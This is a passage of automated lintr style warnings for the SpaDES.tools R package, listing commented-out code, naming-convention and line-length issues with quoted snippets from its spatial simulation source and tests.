^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/spades-tools-deprecated.R:53:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spades-tools-deprecated.R#L53) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:6:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-examples.R#L6) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:17:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-examples.R#L17) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     